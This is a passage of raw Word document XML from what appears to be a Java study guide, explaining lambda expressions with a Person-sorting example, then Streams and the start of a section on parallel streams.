    <w:p w14:paraId="7831B1F1" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25847565"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Lambda expression to print all elements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65986D7E"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forEach(item -&gt; System.out.println(item));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD77C2"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50D8000D"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ambda expressions in Java 8 are a powerful feature that provides a concise way to write functional-style code, especially useful in scenarios involving higher-order functions like filtering, mapping, and reducing collections. They make your code more readable, maintainable, and easier to work with in combination with the Stream API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AA8EC" w14:textId="78CA4E91" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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8329D52">
          <v:rect id="_x0000_i1697" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1EBB4" w14:textId="77777777" w:rsidR="002E2A9A" w:rsidRPr="00CE4B95" w:rsidRDefault="002E2A9A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="_Toc196307709"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to use lambda expressions with one example?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w14:paraId="6CBE5513" w14:textId="6B7CE57A" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00B422C8" w:rsidP="00B422C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ere’s an example of how to use </w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidR="00D844E8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2AF17"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Using a Lambda Expression to Sort a List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1993E27E"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ppose you have a list of Person objects, and you want to sort them based on their age using a lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5964CD25"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ep 1: Define the Person class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1EE853"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Person {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC37080"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BFA8C1"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB9CE2D" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45277AED"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A3A334"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Person(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8B1D9"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B8EE6"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF5E8D1"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6F17CE9" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7951A818"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Getters for name and age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAA9C6D"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ring getName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FD73E"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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431309A"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E225DEE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077A7970"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091687A"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561B8EE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71006D88" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3876F55D"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46AFCD79"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ring toString() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A68E1"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Person{name='" + name + "', age=" + age + "}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A467C58"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D1D186F"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03F1359"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ep 2: Use a Lambda Expression to Sort the List by Age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5F992"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w, we will use a lambda expression to sort the list of Person objects by age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D457BD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36D7AE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24FD2F50"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LambdaExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200CE8B4"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2A4816A9"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e a list of Person objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A1FFF"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Person&gt; people = Arrays.asList(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA41DD"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new Person("John", 30),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DBF62"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new Person("Alice", 25),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B3F56F"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new Person("Bob", 35)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB6D48"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6FC2159" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31982408"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ort the list using a lambda expression (sorted by age)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB126F"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eople.sort((p1, p2) -&gt; Integer.compare(p1.getAge(), p2.getAge()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF09C3" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A5644B8"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Print the sorted list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A97409B"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eople.forEach(person -&gt; System.out.println(person));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67963427"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85B9EB4"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DE40D66"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2C9C2" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ambda Expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47631129" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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lambda expression (p1, p2) -&gt; Integer.compare(p1.getAge(), p2.getAge()) is used to define the sorting logic. It compares the ages of two Person objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E962B22" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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ort() method of the List interface takes a Comparator. The lambda expression provides the comparator for comparing Person objects based on age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22019E01" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ambda Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3317605C" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10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ger.compare(p1.getAge(), p2.getAge()) returns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D874A7" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10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negative value if p1.getAge() is less than p2.getAge().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FFEC3A" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10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positive value if p1.getAge() is greater than p2.getAge().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49166ACD" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10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Zero if both ages are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0C0C5E" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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ing forEach</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The forEach() method is then used to print the sorted list, where each person object is printed using the toString() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75436071"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p w14:paraId="34D7B747"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erson{name='Alice', age=25}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EEBBE"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erson{name='John', age=30}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C6C6C5"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erson{name='Bob', age=35}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C438E1"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C6C3E3" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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lambda expression simplifies the sorting code and eliminates the need for creating an anonymous class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B55C57D" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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allows you to define the behavior (comparing by age) directly within the method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14862727"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example shows the power of lambda expressions to write concise and readable code, especially when dealing with collections and performing common operations like sorting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2268FB20" w14:textId="062B716D" w:rsidR="00936CAC" w:rsidRPr="00CE4B95"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ACA83B4">
          <v:rect id="_x0000_i1698" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="254670A6" w14:textId="77777777" w:rsidR="002E2A9A" w:rsidRPr="00CE4B95" w:rsidRDefault="002E2A9A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc196307710"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Stream and Parallel stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w14:paraId="4AFBD530" w14:textId="73751706" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ream in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E7BCA"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Stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a sequence of elements that can be processed in parallel or sequentially. It is introduced in Java 8 and provides a high-level abstraction for performing operations on collections (like filtering, mapping, reducing, etc.) in a functional programming style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244FB6B2"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Streams can process data in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> way, meaning you describe what you want to do with the data, rather than how it should be done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21209AFD"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Characteristics of Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE6AAF5" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A Stream does not store elements. It simply conveys elements from a source (such as a collection) through a pipeline of computational steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E396B0B" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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unctional in Nature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Operations on streams are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazily</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> evaluated (i.e., they are not executed until a terminal operation is invoked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC7084" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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upports Aggregate Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Operations like filtering, mapping, and reducing are all supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D056AF7" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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an Be Parallelized</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Streams can be processed sequentially or in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E57F0B"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ream Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16477F79" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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termediate Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These operations return a new Stream and are lazy (e.g., map(), filter(), sorted()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF1FA75" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103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erminal Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These operations produce a result or a side-effect (e.g., collect(), forEach(), reduce()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11222882"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Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6678BA12"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4087433E"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B8149" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400B863E"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treamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1529BF42"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7D9B0C6F"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4038E6C6" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FA1BDC"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sing a Stream to sum the even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530BB045"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sum = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02762FBF"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lter(n -&gt; n % 2 == 0)  // Filter even numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B125C5A"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ToInt(Integer::intValue) // Convert Integer to int</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D9162"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um();  // Sum the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F3F46" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EDB3374"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um of even numbers: " + sum);  // Output: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A51A681"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96D9A01"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CB9C47F"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 the stream is created from a list, filtered to keep only even numbers, and then the sum of those numbers is computed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB41574" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00B422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7F70612">
          <v:rect id="_x0000_i1699" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7CA66"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arallel Stream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C7AED"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parallel stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a special kind of stream in Java that allows operations on the stream to be executed </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrently</w:t>
      </w:r>
